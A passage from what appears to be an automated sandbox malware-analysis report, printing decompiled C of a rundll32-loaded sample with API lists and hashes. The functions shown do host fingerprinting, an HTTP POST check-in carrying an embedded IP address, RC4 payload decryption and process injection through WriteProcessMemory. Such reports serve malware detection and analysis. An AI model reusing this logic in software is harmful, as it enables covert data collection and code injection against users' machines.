                                                  										_v28 = _v28 | 0x00001100;
                                                  										InternetSetOptionA(_v8, 0x1f,  &_v28, 4);
                                                  									}
                                                  									HttpSendRequestA(_v8, 0, 0, 0, 0); // executed
                                                  									_v32 = 0;
                                                  									_v44 = 4;
                                                  									HttpQueryInfoA(_v8, 0x20000013,  &_v32,  &_v44, 0);
                                                  									if(_v32 != 0xc8 || _a8 == 0) {
                                                  										L26:
                                                  										InternetCloseHandle(_v8); // executed
                                                  										InternetCloseHandle(_v16);
                                                  										if(_v32 != 0xc8) {
                                                  											return 0;
                                                  										}
                                                  										return 1;
                                                  									} else {
                                                  										 *_a16 = 0;
                                                  										while(1 != 0) {
                                                  											_t97 = InternetReadFile(_v8, _a8, _a12,  &_v12); // executed
                                                  											_v48 = _t97;
                                                  											if(_v48 != 1 || _v12 <= 0) {
                                                  												goto L26;
                                                  											} else {
                                                  												_a8 = _a8 + _v12;
                                                  												_a12 = _a12 - _v12;
                                                  												 *_a16 =  *_a16 + _v12;
                                                  												continue;
                                                  											}
                                                  										}
                                                  										goto L26;
                                                  									}
                                                  								}
                                                  								InternetCloseHandle(_v16);
                                                  								return 0;
                                                  							} else {
                                                  								return 0;
                                                  							}
                                                  						}
                                                  						return 0;
                                                  					} else {
                                                  						return 0;
                                                  					}
                                                  				}
                                                  				return 0;
                                                  			}

                                                  Instruction addresses for the C listing above (one per source line in the original side column; zeros mark lines with no address): 0x00341ff1 0x00341ff9 0x00342006 0x00342009 0x00342016 0x00342019 0x00342028 0x00342038 0x0034204c 0x00342054 0x00342061 0x00342063 0x00342063 0x0034206e 0x0034207d 0x00342082 0x00342089 0x00342096 0x0034209a 0x003420a5 0x003420b0 0x003420b0 0x003420cd 0x003420d3 0x003420da 0x00342108 0x0034210f 0x00342126 0x00342128 0x0034213d 0x0034214b 0x0034215a 0x0034215a 0x0034216c 0x00342172 0x00342179 0x00342193 0x003421a0 0x00342204 0x00342208 0x00342212 0x0034221f 0x00000000 0x00342228 0x00000000 0x003421a8 0x003421ab 0x003421b1 0x003421ca 0x003421d0 0x003421d7 0x00000000 0x003421df 0x003421e5 0x003421ee 0x003421fc 0x00000000 0x00342202 0x003421d7 0x00000000 0x003421b1 0x003421a0 0x00342115 0x00000000 0x003420dc 0x00000000 0x003420dc 0x003420da 0x00000000 0x00342076 0x00000000 0x00342076 0x0034206e 0x00000000

                                                  APIs
                                                  • InternetCrackUrlA.WININET(00341AD9,00000000,00000000,0000003C), ref: 0034204C
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348545446.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                  • Associated: 00000005.00000002.2348540160.0000000000340000.00000002.00020000.sdmp
                                                  • Associated: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp
                                                  • Associated: 00000005.00000002.2348559404.0000000000345000.00000004.00020000.sdmp
                                                  • Associated: 00000005.00000002.2348564612.0000000000348000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_340000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: CrackInternet
                                                  • String ID: <$GET$b%4
                                                  • API String ID: 1381609488-3990811026
                                                  • Opcode ID: 3f16654737ec8329ee9c171fbc9684e0ef6940ee9561aff2280cbf235cdc0108
                                                  • Instruction ID: 858210e9bf5f2fd06378b79b77eb74743c289ea269def6f0c81301cfc60e9672
                                                  • Opcode Fuzzy Hash: 3f16654737ec8329ee9c171fbc9684e0ef6940ee9561aff2280cbf235cdc0108
                                                  • Instruction Fuzzy Hash: 3C71FB74D00209EBEB15CF94D849BEFB7B8AB48704F508469F611BB280D7B5AA44CF61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  • VirtualAlloc.KERNELBASE(00000000,00000747,00003000,00000040,00000747,0036E520), ref: 0036EB8E
                                                  • VirtualAlloc.KERNEL32(00000000,00000056,00003000,00000040,0036E583), ref: 0036EBC5
                                                  • VirtualAlloc.KERNEL32(00000000,00008440,00003000,00000040), ref: 0036EC25
                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0036EC5B
                                                  • VirtualProtect.KERNEL32(00340000,00000000,00000004,0036EAB0), ref: 0036ED60
                                                  • VirtualProtect.KERNEL32(00340000,00001000,00000004,0036EAB0), ref: 0036ED87
                                                  • VirtualProtect.KERNEL32(00000000,?,00000002,0036EAB0), ref: 0036EE54
                                                  • VirtualProtect.KERNEL32(00000000,?,00000002,0036EAB0,?), ref: 0036EEAA
                                                  • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0036EEC6
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348607784.000000000036E000.00000040.00020000.sdmp, Offset: 0036E000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_36e000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Virtual$Protect$Alloc$Free
                                                  • String ID:
                                                  • API String ID: 2574235972-0
                                                  • Opcode ID: b8860180137a99a01dd5583635bfa050268266bf5e99bcb38fbceefd7ff4e24e
                                                  • Instruction ID: fe9c6763fb14d4ce60d0bc32a70d4ed0e82d91f9040b0920a7b072d327cffc37
                                                  • Opcode Fuzzy Hash: b8860180137a99a01dd5583635bfa050268266bf5e99bcb38fbceefd7ff4e24e
                                                  • Instruction Fuzzy Hash: 31D16936580680DFEB12CF04CC81F5177AAFF49310B1941A4EE0BAF65AD770A858DBE6
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 37%
                                                  			E00342CD0(BYTE* _a4, int _a8, intOrPtr _a12, intOrPtr _a16) {
                                                  				int _v8;
                                                  				long* _v12;
                                                  				long* _v16;
                                                  				int _v20;
                                                  				intOrPtr _v24;
                                                  				int _t32;
                                                  				intOrPtr _t33;
                                                  				long* _t35;
                                                  
                                                  				_v16 = 0;
                                                  				_v8 = 0;
                                                  				_v12 = 0;
                                                  				_v20 = 0;
				_v24 = 0x280011; // CryptDeriveKey flags: key length 0x28 (40 bits) in the upper word, CRYPT_EXPORTABLE | CRYPT_NO_SALT in the lower word
				_t32 = CryptAcquireContextA( &_v12, 0, 0, 1, 0xf0000000); // executed; PROV_RSA_FULL with CRYPT_VERIFYCONTEXT
                                                  				if(_t32 != 0) {
					__imp__CryptCreateHash(_v12, 0x8004, 0, 0,  &_v8); // 0x8004 = CALG_MD5
                                                  					if(_t32 != 0) {
                                                  						_t33 = _a16;
                                                  						__imp__CryptHashData(_v8, _a12, _t33, 0);
                                                  						if(_t33 != 0) {
                                                  							_t35 = _v12;
							__imp__CryptDeriveKey(_t35, 0x6801, _v8, _v24,  &_v16); // 0x6801 = CALG_RC4, key derived from the MD5 hash
                                                  							if(_t35 != 0) {
                                                  								if(CryptDecrypt(_v16, 0, 1, 0, _a4,  &_a8) != 0) {
                                                  									_v20 = _a8;
                                                  								}
                                                  							}
                                                  						}
                                                  					}
                                                  				}
                                                  				if(_v8 != 0) {
                                                  					__imp__CryptDestroyHash(_v8);
                                                  					_v8 = 0;
                                                  				}
                                                  				if(_v16 != 0) {
                                                  					CryptDestroyKey(_v16);
                                                  					_v16 = 0;
                                                  				}
                                                  				if(_v12 != 0) {
                                                  					CryptReleaseContext(_v12, 0);
                                                  					_v12 = 0;
                                                  				}
                                                  				return _v20;
                                                  			}

                                                  APIs
                                                  • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000), ref: 00342D08
                                                  • CryptCreateHash.ADVAPI32(00000000,00008004,00000000,00000000,00000000), ref: 00342D2D
                                                  • CryptDestroyHash.ADVAPI32(00000000), ref: 00342DAA
                                                  • CryptDestroyKey.ADVAPI32(00000000), ref: 00342DC1
                                                  • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00342DDA
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348545446.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                  • Associated: 00000005.00000002.2348540160.0000000000340000.00000002.00020000.sdmp
                                                  • Associated: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp
                                                  • Associated: 00000005.00000002.2348559404.0000000000345000.00000004.00020000.sdmp
                                                  • Associated: 00000005.00000002.2348564612.0000000000348000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_340000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Crypt$ContextDestroyHash$AcquireCreateRelease
                                                  • String ID:
                                                  • API String ID: 1222261195-0
                                                  • Opcode ID: 2715d1e805116782b2e2b0a8f1876e14d5461af7cb73b9ee0d84011dd38788ad
                                                  • Instruction ID: 9758c764814f041e1c376b0fb8701045b6d50443913e917bc034a41f78d8973c
                                                  • Opcode Fuzzy Hash: 2715d1e805116782b2e2b0a8f1876e14d5461af7cb73b9ee0d84011dd38788ad
                                                  • Instruction Fuzzy Hash: 98312E79E00208FBEB15CFA4DC49FAFB7B8AB45705F508058F611BB280D7B5AA44DB54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 75%
                                                  			E00343400() {
                                                  				struct HINSTANCE__* _v8;
                                                  				_Unknown_base(*)()* _v12;
                                                  				struct _SYSTEM_INFO _v48;
                                                  
                                                  				E003414A0( &_v48, 0, 0x24);
                                                  				_v8 = GetModuleHandleA("kernel32.dll");
                                                  				if(_v8 != 0) {
                                                  					_v12 = GetProcAddress(_v8, "GetNativeSystemInfo");
                                                  					if(_v12 == 0) {
                                                  						GetSystemInfo( &_v48);
                                                  					} else {
                                                  						_v12( &_v48);
                                                  					}
					if((_v48.dwOemId & 0x0000ffff) != 9) { // wProcessorArchitecture == 9 means PROCESSOR_ARCHITECTURE_AMD64 (x64 host)
                                                  						return 0;
                                                  					} else {
                                                  						return 1;
                                                  					}
                                                  				}
                                                  				return 0;
                                                  			}

                                                  APIs
                                                  • GetModuleHandleA.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,?,?,00341B21), ref: 0034341B
                                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00343437
                                                  • GetNativeSystemInfo.KERNEL32(?), ref: 0034344A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348545446.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
                                                  • Associated: 00000005.00000002.2348540160.0000000000340000.00000002.00020000.sdmp
                                                  • Associated: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp
                                                  • Associated: 00000005.00000002.2348559404.0000000000345000.00000004.00020000.sdmp
                                                  • Associated: 00000005.00000002.2348564612.0000000000348000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_340000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressHandleInfoModuleNativeProcSystem
                                                  • String ID: GetNativeSystemInfo$kernel32.dll
                                                  • API String ID: 3469989633-192647395
                                                  • Opcode ID: 27a495caee833a46c6e130f6c3777f5d2f70963e35cacb308ca3274ab44b0334
                                                  • Instruction ID: c5a16b9ad821bc9b9dcd82342777376585b6a8c9f778832950ba0a6e769d6195
                                                  • Opcode Fuzzy Hash: 27a495caee833a46c6e130f6c3777f5d2f70963e35cacb308ca3274ab44b0334
                                                  • Instruction Fuzzy Hash: C7018134D00208EBCB06DFF698497EDB7F8EB08711F108565E601BB280E778A794D760
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 95%
                                                  			E00341AA0(intOrPtr __edx, void* __eflags, void* _a4, intOrPtr _a8, DWORD* _a12) {
                                                  				intOrPtr _v8;
                                                  				signed int _v12;
                                                  				signed int _v16;
                                                  				signed int _v20;
                                                  				intOrPtr _v24;
                                                  				intOrPtr _v28;
                                                  				intOrPtr _v32;
                                                  				intOrPtr _v36;
                                                  				char _v68;
                                                  				char _v324;
                                                  				char _v2372;
                                                  				char _v6468;
                                                  				intOrPtr _t47;
                                                  				intOrPtr _t56;
                                                  				char* _t63;
                                                  				intOrPtr _t66;
                                                  				intOrPtr _t69;
                                                  				intOrPtr _t70;
                                                  				intOrPtr _t71;
                                                  				char* _t72;
                                                  				void* _t75;
                                                  				char* _t89;
                                                  				intOrPtr _t95;
                                                  				char* _t104;
                                                  				intOrPtr _t106;
                                                  				void* _t110;
                                                  				void* _t113;
                                                  				void* _t114;
                                                  
                                                  				_t95 = __edx;
                                                  				E00341420(0x1940);
                                                  				_v12 = GetVersion();
                                                  				_t47 = E00342630(_t95); // executed
                                                  				_v32 = _t47;
                                                  				_v28 = _t95;
                                                  				E003430F0( &_v324); // executed
                                                  				E00342520( &_v68,  &_v68); // executed
                                                  				E003423C0( &_v2372); // executed
                                                  				_t113 = _t110 + 0xc;
                                                  				_v20 = _v12 & 0xff;
                                                  				_v16 = (_v12 & 0xffff) >> 0x00000008 & 0xff;
                                                  				_t56 = E00343400(); // executed
                                                  				_v36 = _t56;
                                                  				if(_v36 != 1) {
                                                  					_push(_v16);
                                                  					wsprintfA( &_v6468, "GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x32)", _v32, _v28, E003425B0( &_v68),  &_v324,  &_v2372,  &_v68, _v20);
                                                  					_t114 = _t113 + 0x28;
                                                  				} else {
                                                  					_push(_v16);
                                                  					_t75 = E003425B0( &_v324); // executed
                                                  					wsprintfA( &_v6468, "GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)", _v32, _v28, _t75,  &_v324,  &_v2372,  &_v68, _v20);
                                                  					_t114 = _t113 + 0x28;
                                                  				}
                                                  				if( *0x3472a0 == 0) {
                                                  					_t71 = E00341390(0x400);
                                                  					_t114 = _t114 + 4;
                                                  					 *0x3472a0 = _t71;
                                                  					_t72 =  *0x3472a0; // 0x55c170
                                                  					 *_t72 = 0;
                                                  				}
                                                  				_v24 = 1;
                                                  				while(_v24 == 1) {
                                                  					_t63 =  *0x3472a0; // 0x55c170
                                                  					_t87 =  *_t63;
                                                  					if( *_t63 == 0) {
                                                  						_t106 =  *0x3472a0; // 0x55c170
                                                  						_t70 = E00342660(_t87, _t106);
                                                  						_t114 = _t114 + 4;
                                                  						_v24 = _t70;
                                                  					}
                                                  					_t89 =  *0x3472a0; // 0x55c170
                                                  					_t66 = E003428D0(_t89,  &_v6468, _a4, _a8, _a12); // executed
                                                  					_t114 = _t114 + 0x14;
                                                  					_v8 = _t66;
                                                  					if(_v8 == 1) {
                                                  						_t69 = E00341A00(_t89, _a4);
                                                  						_t114 = _t114 + 4;
                                                  						_v8 = _t69;
                                                  					}
                                                  					if(_v8 != 1) {
                                                  						_t104 =  *0x3472a0; // 0x55c170
                                                  						 *_t104 = 0;
                                                  						continue;
                                                  					} else {
                                                  						return 1;
                                                  					}
                                                  				}
                                                  				return 0;
                                                  			}
                                                  0x00341c5f
                                                  0x00000000
                                                  0x00341c4a
                                                  0x00000000
                                                  0x00341c4a
                                                  0x00341c48
                                                  0x00000000

                                                  APIs
                                                  • GetVersion.KERNEL32(?,003418CD,?,00100000,?), ref: 00341AAD
                                                    • Part of subcall function 003430F0: GetComputerNameA.KERNEL32(?,00000104), ref: 0034311A
                                                    • Part of subcall function 003430F0: lstrcatA.KERNEL32(00100000,?), ref: 0034312F
                                                    • Part of subcall function 003430F0: lstrcatA.KERNEL32(00100000, @ ), ref: 0034313E
                                                    • Part of subcall function 003430F0: lstrcatA.KERNEL32(00100000,?), ref: 00343162
                                                    • Part of subcall function 00342520: lstrcpyA.KERNEL32(00341AD9,84.17.52.8,?,?,00341AD9,?,?), ref: 00342540
                                                    • Part of subcall function 003423C0: DsEnumerateDomainTrustsA.NETAPI32(00000000,0000003F,00341AE8,?,?,00341AE8,?,?,?), ref: 003423E1
                                                    • Part of subcall function 00343400: GetModuleHandleA.KERNEL32(kernel32.dll,?,?,?,?,?,?,?,?,?,?,?,?,?,00341B21), ref: 0034341B
                                                  • wsprintfA.USER32 ref: 00341B5E
                                                  • wsprintfA.USER32 ref: 00341B9D
                                                  Strings
                                                  • GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x32), xrefs: 00341B91
                                                  • GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64), xrefs: 00341B52
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348545446.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000005.00000002.2348540160.0000000000340000.00000002.00020000.sdmp
• Associated: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp
• Associated: 00000005.00000002.2348559404.0000000000345000.00000004.00020000.sdmp
• Associated: 00000005.00000002.2348564612.0000000000348000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_340000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: lstrcat$wsprintf$ComputerDomainEnumerateHandleModuleNameTrustsVersionlstrcpy
                                                  • String ID: GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x32)$GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)
                                                  • API String ID: 768865819-2171647522
                                                  • Opcode ID: b89b1dc0f49e362b062368d8d4336e97ef04c9efc8478a0b3d0af7cc3d8cbabd
                                                  • Instruction ID: e228579921a923e20b3c2eae77035d1985fb8b362c3e3545dc034b6b895a1377
                                                  • Opcode Fuzzy Hash: b89b1dc0f49e362b062368d8d4336e97ef04c9efc8478a0b3d0af7cc3d8cbabd
                                                  • Instruction Fuzzy Hash: 2D513DB6D002199BDB16DF94DC91AFEB7F8FB48300F048569F206AF241E734AA85CB51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  control_flow_graph 258 343270-3432a2 259 3432a9-3432c9 VirtualAllocEx 258->259 260 3432eb-3432ef 259->260 261 3432cb-3432e8 VirtualAllocEx 259->261 262 3432f6-343309 call 341390 260->262 263 3432f1 260->263 261->260 270 34330d-343327 call 343a00 262->270 271 34330b 262->271 264 34337c-343380 263->264 266 343382-34338b call 3413d0 264->266 267 34338e-343392 264->267 266->267 272 343394-343398 267->272 273 3433af-3433b5 267->273 278 34334d 270->278 279 343329-34332d 270->279 271->264 272->273 276 34339a-3433a9 VirtualFreeEx 272->276 276->273 278->264 280 343337-34333b 279->280 281 34332f-343335 279->281 282 34333d-343349 280->282 283 34334b-343369 WriteProcessMemory 280->283 281->280 282->283 285 34336d-343376 283->285 286 34336b 283->286 285->259 285->264 286->264
                                                  C-Code - Quality: 88%
                                                  			E00343270(void* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                  				void* _v8;
                                                  				void* _v12;
                                                  				void* _v16;
                                                  				long _v20;
                                                  				intOrPtr _v24;
                                                  				long _v28;
                                                  				void* _t55;
                                                  				void* _t57;
                                                  				void* _t59;
                                                  				int _t65;
                                                  				void* _t92;
                                                  				void* _t93;
                                                  
                                                  				_t3 = _a8 + 0x3c; // 0xf445c7f8
                                                  				_v24 = _a8 +  *_t3;
                                                  				_v16 =  *((intOrPtr*)(_v24 + 0x34));
                                                  				_v20 =  *((intOrPtr*)(_v24 + 0x50));
                                                  				_v12 = 0;
                                                  				_v8 = 0;
                                                  				_v28 = 0;
                                                  				while(1) {
                                                  					_t55 = VirtualAllocEx(_a4, _v16, _v20, 0x3000, 0x40); // executed
                                                  					_v8 = _t55;
                                                  					if(_v8 == 0) {
                                                  						_v8 = VirtualAllocEx(_a4, 0, _v20, 0x3000, 0x40);
                                                  						_v16 = _v8;
                                                  					}
                                                  					if(_v8 == 0) {
                                                  						break;
                                                  					}
                                                  					_t57 = E00341390(_v20); // executed
                                                  					_t93 = _t92 + 4;
                                                  					_v12 = _t57;
                                                  					if(_v12 != 0) {
                                                  						_t59 = E00343A00(_a8, _a12, _v12, _v16);
                                                  						_t92 = _t93 + 0x10;
                                                  						if(_t59 == 0) {
                                                  						} else {
                                                  							if(_a16 != 0) {
                                                  								 *_a16 = _v16;
                                                  							}
                                                  							if(_a20 != 0) {
                                                  								 *_a20 = _v16 +  *((intOrPtr*)(_v24 + 0x28));
                                                  							}
                                                  							_t65 = WriteProcessMemory(_a4, _v8, _v12, _v20, 0); // executed
                                                  							if(_t65 != 0) {
                                                  								_v28 = 1;
                                                  								if(0 != 0) {
                                                  									continue;
                                                  								}
                                                  							} else {
                                                  							}
                                                  						}
                                                  					} else {
                                                  					}
                                                  					L17:
                                                  					if(_v12 != 0) {
                                                  						E003413D0(_v12);
                                                  					}
                                                  					if(_v8 != 0 && _v28 == 0) {
                                                  						VirtualFreeEx(_a4, _v8, 0, 0x8000);
                                                  					}
                                                  					return _v28;
                                                  				}
                                                  				goto L17;
                                                  			}

                                                  0x0034327c
                                                  0x0034327f
                                                  0x00343288
                                                  0x00343291
                                                  0x00343294
                                                  0x0034329b
                                                  0x003432a2
                                                  0x003432a9
                                                  0x003432bc
                                                  0x003432c2
                                                  0x003432c9
                                                  0x003432e2
                                                  0x003432e8
                                                  0x003432e8
                                                  0x003432ef
                                                  0x00000000
                                                  0x00000000
                                                  0x003432fa
                                                  0x003432ff
                                                  0x00343302
                                                  0x00343309
                                                  0x0034331d
                                                  0x00343322
                                                  0x00343327
                                                  0x00343329
                                                  0x0034332d
                                                  0x00343335
                                                  0x00343335
                                                  0x0034333b
                                                  0x00343349
                                                  0x00343349
                                                  0x00343361
                                                  0x00343369
                                                  0x0034336d
                                                  0x00343376
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x0034336b
                                                  0x00343369
                                                  0x00000000
                                                  0x0034330b
                                                  0x0034337c
                                                  0x00343380
                                                  0x00343386
                                                  0x0034338b
                                                  0x00343392
                                                  0x003433a9
                                                  0x003433a9
                                                  0x003433b5
                                                  0x003433b5
                                                  0x00000000

                                                  APIs
                                                  • VirtualAllocEx.KERNELBASE(00000000,00341ECF,FFFFFFFF,00003000,00000040), ref: 003432BC
                                                  • VirtualAllocEx.KERNEL32(00000000,00000000,FFFFFFFF,00003000,00000040), ref: 003432DC
                                                    • Part of subcall function 00341390: GetProcessHeap.KERNEL32(?,00341886,00100000), ref: 0034139C
                                                    • Part of subcall function 00341390: RtlAllocateHeap.NTDLL(004E0000,00000000,00341886,?,00341886,00100000), ref: 003413BD
                                                  • WriteProcessMemory.KERNELBASE(00000000,00000000,00000000,FFFFFFFF,00000000), ref: 00343361
                                                  • VirtualFreeEx.KERNEL32(00000000,00000000,00000000,00008000), ref: 003433A9
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348545446.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000005.00000002.2348540160.0000000000340000.00000002.00020000.sdmp
• Associated: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp
• Associated: 00000005.00000002.2348559404.0000000000345000.00000004.00020000.sdmp
• Associated: 00000005.00000002.2348564612.0000000000348000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_340000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Virtual$AllocHeapProcess$AllocateFreeMemoryWrite
                                                  • String ID:
                                                  • API String ID: 2713107948-0
                                                  • Opcode ID: 26d3f7eb18b25d551af0c4004d82cbc225dd15d637bc00baec67181199dccc9e
                                                  • Instruction ID: bd334f9dc39eb7bed6d7df267e5a07808eac8a0f637791c6f5dc1255fd71d237
                                                  • Opcode Fuzzy Hash: 26d3f7eb18b25d551af0c4004d82cbc225dd15d637bc00baec67181199dccc9e
                                                  • Instruction Fuzzy Hash: A041ECB9A00209EFDB15DF94C895BAEB7F5BB48704F108558E905AB280D774BB40CF91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E00341390(long _a4) {
                                                  				void* _t4;
                                                  				void* _t6;
                                                  
                                                  				if( *0x34715c == 0) {
                                                  					 *0x34715c = GetProcessHeap();
                                                  				}
                                                  				if( *0x34715c == 0) {
                                                  					return 0;
                                                  				} else {
                                                  					_t6 =  *0x34715c; // 0x4e0000
                                                  					_t4 = RtlAllocateHeap(_t6, 0, _a4); // executed
                                                  					return _t4;
                                                  				}
                                                  			}

                                                  0x0034139a
                                                  0x003413a2
                                                  0x003413a2
                                                  0x003413ae
                                                  0x00000000
                                                  0x003413b0
                                                  0x003413b6
                                                  0x003413bd
                                                  0x00000000
                                                  0x003413bd

                                                  APIs
                                                  • GetProcessHeap.KERNEL32(?,00341886,00100000), ref: 0034139C
                                                  • RtlAllocateHeap.NTDLL(004E0000,00000000,00341886,?,00341886,00100000), ref: 003413BD
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.2348545446.0000000000341000.00000020.00020000.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000005.00000002.2348540160.0000000000340000.00000002.00020000.sdmp
• Associated: 00000005.00000002.2348553427.0000000000344000.00000002.00020000.sdmp
• Associated: 00000005.00000002.2348559404.0000000000345000.00000004.00020000.sdmp
• Associated: 00000005.00000002.2348564612.0000000000348000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_340000_rundll32.jbxd
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Heap$AllocateProcess
                                                  • String ID:
                                                  • API String ID: 1357844191-0
                                                  • Opcode ID: 0143b3bf0a7d0202e7e5f547db4947834e8fdc1f79d2400bb41416e92837fd7f
                                                  • Instruction ID: c00818e2851e0583ffa857bffbb5d6a9a7207227db6b0c1e71110e6a89536cd0
                                                  • Opcode Fuzzy Hash: 0143b3bf0a7d0202e7e5f547db4947834e8fdc1f79d2400bb41416e92837fd7f
                                                  • Instruction Fuzzy Hash: 4BE0BD39208685DBD34A9FA1EC0CB2577ECA307385F018424AA058EBA0DB75B898CF50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                  			E003428D0(char* _a4, CHAR* _a8, void* _a12, intOrPtr _a16, DWORD* _a20) {
                                                  				void* _v8;
                                                  				void* _v12;
                                                  				signed short _v16;
                                                  				signed int _v20;
                                                  				void _v24;
                                                  				void _v28;
                                                  				void* _v32;
                                                  				int _v36;
                                                  				long _v40;
                                                  				int _v44;
                                                  				int _v48;
                                                  				long _v52;
                                                  				intOrPtr _v64;
                                                  				char* _v68;
                                                  				signed short _v88;
                                                  				intOrPtr _v92;
                                                  				char* _v96;
                                                  				long _v100;
                                                  				void* _v112;
                                                  				char _v372;
                                                  				char _v632;
                                                  				void* _t86;
                                                  				int _t90;
                                                  				int _t100;
                                                  				void* _t145;
                                                  
                                                  				E003414A0( &_v112, 0, 0x3c);
                                                  				_v112 = 0x3c;
                                                  				_v96 =  &_v372;
                                                  				_v92 = 0x104;
                                                  				_v68 =  &_v632;
                                                  				_v64 = 0x104;
                                                  				_v36 = 0;
                                                  				_v44 = lstrlenA("Content-Type: application/x-www-form-urlencoded");
                                                  				 *((char*)(_t145 + 0xfffffffffffffe90)) = 0;
                                                  				 *((char*)(_t145 + 0xfffffffffffffd8c)) = 0;
                                                  				if(_a8 != 0) {
                                                  					_v36 = lstrlenA(_a8);
                                                  				}
                                                  				if(InternetCrackUrlA(_a4, 0, 0,  &_v112) != 0) {
                                                  					if(_v100 == 0) {
                                                  						_v100 = 3;
                                                  					}
                                                  					if(_v100 == 3 || _v100 == 4) {
                                                  						_v32 = E003424F0();
                                                  						if(_v32 != 0) {
                                                  							_v16 = _v88;
                                                  							_v20 = 0x84080100;
                                                  							if(_v100 == 4) {
                                                  								_v20 = _v20 | 0x00803000;
                                                  							}
                                                  							_t86 = InternetConnectA(_v32,  &_v372, _v16 & 0x0000ffff, 0, 0, 3, 0, 0); // executed
                                                  							_v12 = _t86;
                                                  							if(_v12 != 0) {
                                                  								_v8 = HttpOpenRequestA(_v12, "POST",  &_v632, 0, 0, 0x347048, _v20, 0);
                                                  								if(_v8 != 0) {
                                                  									if(_v100 == 4) {
                                                  										_v40 = 4;
                                                  										InternetQueryOptionA(_v8, 0x1f,  &_v24,  &_v40);
                                                  										_v24 = _v24 | 0x00001100;
                                                  										InternetSetOptionA(_v8, 0x1f,  &_v24, 4);
                                                  									}
                                                  									_t90 = HttpSendRequestA(_v8, "Content-Type: application/x-www-form-urlencoded", _v44, _a8, _v36); // executed
                                                  									_v48 = _t90;
                                                  									_v28 = 0;
                                                  									if(_v48 == 1) {
                                                  										_v52 = 4;
                                                  										HttpQueryInfoA(_v8, 0x20000013,  &_v28,  &_v52, 0);
                                                  										if(_v28 == 0xc8 && _a12 != 0) {
                                                  											_t100 = InternetReadFile(_v8, _a12, _a16 - 1, _a20); // executed
                                                  											if(_t100 == 0 ||  *_a20 <= 0) {
                                                  												 *_a20 = 0;
                                                  											} else {
                                                  												 *((char*)(_a12 +  *_a20)) = 0;
                                                  											}
                                                  										}
                                                  									}
                                                  									InternetCloseHandle(_v8);
                                                  									InternetCloseHandle(_v12);
                                                  									if(_v28 != 0xc8) {
                                                  										return 0;
                                                  									} else {
                                                  										return 1;
                                                  									}
                                                  								}
                                                  								InternetCloseHandle(_v12);
                                                  								return 0;
                                                  							} else {
                                                  								return 0;
                                                  							}
                                                  						}
                                                  						return 0;
